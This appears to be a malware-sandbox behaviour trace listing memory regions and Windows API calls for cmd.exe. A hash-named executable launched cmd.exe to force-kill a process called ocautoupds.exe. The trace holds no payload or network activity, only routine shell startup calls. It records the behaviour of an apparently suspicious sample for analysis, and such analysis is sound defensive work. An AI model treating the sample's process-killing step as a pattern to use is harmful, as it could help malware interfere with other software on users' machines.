region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2771 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2772 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2773 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2774 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2775 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2776 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2777 start_va = 0x710000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 2778 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2779 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2780 start_va = 0x890000 end_va = 0xbc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 212 os_tid = 0x1350 [0172.139] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0172.139] __set_app_type (_Type=0x1) [0172.139] __p__fmode () returned 0x74974d6c [0172.139] __p__commode () returned 0x74975b1c [0172.139] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0172.139] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0172.139] GetCurrentThreadId () returned 0x1350 [0172.139] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x1350) returned 0x78 [0172.140] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0172.140] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0172.140] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.148] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.148] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0172.149] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.149] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.149] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.149] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.149] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.149] GetConsoleOutputCP () returned 0x1b5 [0172.150] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0172.151] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0172.151] _get_osfhandle (_FileHandle=1) returned 0x154 [0172.151] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0172.151] _get_osfhandle (_FileHandle=1) returned 0x154 [0172.151] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0172.151] _get_osfhandle (_FileHandle=0) returned 0x144 [0172.151] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0172.151] GetEnvironmentStringsW () returned 0x4d7cc8* [0172.151] GetProcessHeap () returned 0x4d0000 [0172.151] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xa1a) returned 0x4d86f0 [0172.151] FreeEnvironmentStringsA (penv="A") returned 1 [0172.151] GetProcessHeap () returned 0x4d0000 [0172.151] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4) returned 0x4d0550 [0172.151] GetEnvironmentStringsW () returned 0x4d7cc8* [0172.151] GetProcessHeap () returned 0x4d0000 [0172.152] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xa1a) returned 0x4d9118 [0172.152] FreeEnvironmentStringsA (penv="A") returned 1 [0172.152] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0172.152] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0172.152] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0172.152] RegCloseKey (hKey=0x88) returned 0x0 [0172.152] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0172.152] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0172.153] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0172.153] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0172.153] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0172.153] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0172.153] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0172.153] RegCloseKey (hKey=0x88) returned 0x0 [0172.153] time (in: timer=0x0 | out: timer=0x0) returned 0x6234421a [0172.153] srand (_Seed=0x6234421a) [0172.153] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im ocautoupds.exe \"" [0172.153] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im ocautoupds.exe \"" [0172.153] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0172.153] GetProcessHeap () returned 0x4d0000 [0172.153] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x210) returned 0x4d9b40 [0172.153] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d9b48, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0172.153] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0172.153] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0172.153] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.154] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.154] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.154] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.154] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.154] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0172.154] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.154] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.154] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.154] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.154] GetProcessHeap () returned 0x4d0000 [0172.155] RtlFreeHeap (HeapHandle=0x4d0000, Flags=0x0, BaseAddress=0x4d86f0) returned 1 [0172.155] GetEnvironmentStringsW () returned 0x4d7cc8* [0172.155] GetProcessHeap () returned 0x4d0000 [0172.155] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xa32) returned 0x4da798 [0172.155] FreeEnvironmentStringsA (penv="A") returned 1 [0172.155] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0172.155] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.155] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.155] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.155] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.155] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.155] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.155] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.155] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.155] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.155] GetProcessHeap () returned 0x4d0000 [0172.155] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x44) returned 0x4d05c8 [0172.155] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0172.156] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0172.156] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0172.156] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4d0618 [0172.156] FindClose (in: hFindFile=0x4d0618 | out: hFindFile=0x4d0618) returned 1 [0172.156] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x4d0618 [0172.156] FindClose (in: hFindFile=0x4d0618 | out: hFindFile=0x4d0618) returned 1 [0172.157] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0172.157] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4d0618 [0172.157] FindClose (in: hFindFile=0x4d0618 | out: hFindFile=0x4d0618) returned 1 [0172.157] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0172.157] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0172.157] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0172.157] GetProcessHeap () returned 0x4d0000 [0172.158] RtlFreeHeap (HeapHandle=0x4d0000, Flags=0x0, BaseAddress=0x4da798) returned 1 [0172.158] GetEnvironmentStringsW () returned 0x4d7cc8* [0172.158] GetProcessHeap () returned 0x4d0000 [0172.158] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xa76) returned 0x4d9d58 [0172.158] FreeEnvironmentStringsA (penv="=") returned 1 [0172.158] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0172.158] GetProcessHeap () returned 0x4d0000 [0172.158] RtlFreeHeap (HeapHandle=0x4d0000, Flags=0x0, BaseAddress=0x4d05c8) returned 1 [0172.158] GetProcessHeap () returned 0x4d0000 [0172.158] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x400e) returned 0x4dbc58 [0172.159] GetProcessHeap () returned 0x4d0000 [0172.159] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x50) returned 0x4da7d8 [0172.159] GetProcessHeap () returned 0x4d0000 [0172.159] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4008) returned 0x4dfc70 [0172.160] GetProcessHeap () returned 0x4d0000 [0172.160] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4008) returned 0x4e3c80 [0172.161] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0172.161] GetProcessHeap () returned 0x4d0000 [0172.161] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x418) returned 0x4da830 [0172.161] SetErrorMode (uMode=0x0) returned 0x8003 [0172.162] SetErrorMode (uMode=0x1) returned 0x0 [0172.162] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x4da838, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0172.162] SetErrorMode (uMode=0x8003) returned 0x1 [0172.162] GetProcessHeap () returned 0x4d0000 [0172.162] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4da830, Size=0x82) returned 0x4da830 [0172.162] GetProcessHeap () returned 0x4d0000 [0172.162] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4da830) returned 0x82 [0172.162] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0172.162] GetProcessHeap () returned 0x4d0000 [0172.162] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x62) returned 0x4da8c0 [0172.162] GetProcessHeap () returned 0x4d0000 [0172.162] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb8) returned 0x4da930 [0172.162] GetProcessHeap () returned 0x4d0000 [0172.162] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4da930, Size=0x62) returned 0x4da930 [0172.162] GetProcessHeap () returned 0x4d0000 [0172.162] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4da930) returned 0x62 [0172.163] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0172.163] GetProcessHeap () returned 0x4d0000 [0172.163] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xe0) returned 0x4da9a0 [0172.167] GetProcessHeap () returned 0x4d0000 [0172.167] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4da9a0, Size=0x76) returned 0x4da9a0 [0172.167] GetProcessHeap () returned 0x4d0000 [0172.167] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4da9a0) returned 0x76 [0172.167] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.167] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im ocautoupds.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0172.168] GetLastError () returned 0x3 [0172.168] GetProcessHeap () returned 0x4d0000 [0172.168] RtlFreeHeap (HeapHandle=0x4d0000, Flags=0x0, BaseAddress=0x4dfc70) returned 1 [0172.168] GetProcessHeap () returned 0x4d0000 [0172.169] RtlFreeHeap (HeapHandle=0x4d0000, Flags=0x0, BaseAddress=0x4e3c80) returned 1 [0172.169] GetProcessHeap () returned 0x4d0000 [0172.169] RtlFreeHeap (HeapHandle=0x4d0000, Flags=0x0, BaseAddress=0x4dbc58) returned 1 [0172.169] GetConsoleOutputCP () returned 0x1b5 [0172.216] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0172.216] GetUserDefaultLCID () returned 0x409 [0172.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0172.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0172.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0172.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0172.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0172.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0172.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0172.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0172.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0172.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0172.217] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0172.217] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0172.217] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0172.217] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.218] GetProcessHeap () returned 0x4d0000 [0172.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20c) returned 0x4daa68 [0172.219] GetConsoleTitleW (in: lpConsoleTitle=0x4daa68, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0172.221] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0172.221] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0172.221] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0172.221] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0172.222] GetProcessHeap () returned 0x4d0000 [0172.222] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x400a) returned 0x4dbc58 [0172.222] GetProcessHeap () returned 0x4d0000 [0172.222] RtlFreeHeap (HeapHandle=0x4d0000, Flags=0x0, BaseAddress=0x4dbc58) returned 1 [0172.223] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0172.223] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0172.223] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0172.223] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0172.223] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0172.223] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0172.223] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0172.223] GetProcessHeap () returned 0x4d0000 [0172.223] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x58) returned 0x4dac80 [0172.223] GetProcessHeap () returned 0x4d0000 [0172.223] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1a) returned 0x4d0578 [0172.224] GetProcessHeap () returned 0x4d0000 [0172.224] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x38) returned 0x4dace0 [0172.225] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0172.229] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0172.229] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0172.229] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0172.229] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0172.229] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0172.229] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0172.229] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0172.229] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0172.229] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0172.230] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0172.230] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0172.230] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0172.230] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0172.230] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0172.230] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0172.230] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0172.230] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0172.230] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0172.230] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0172.230] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0172.230] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0172.230] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0172.230] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0172.230] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0172.230] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0172.230] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0172.230] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0172.230] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 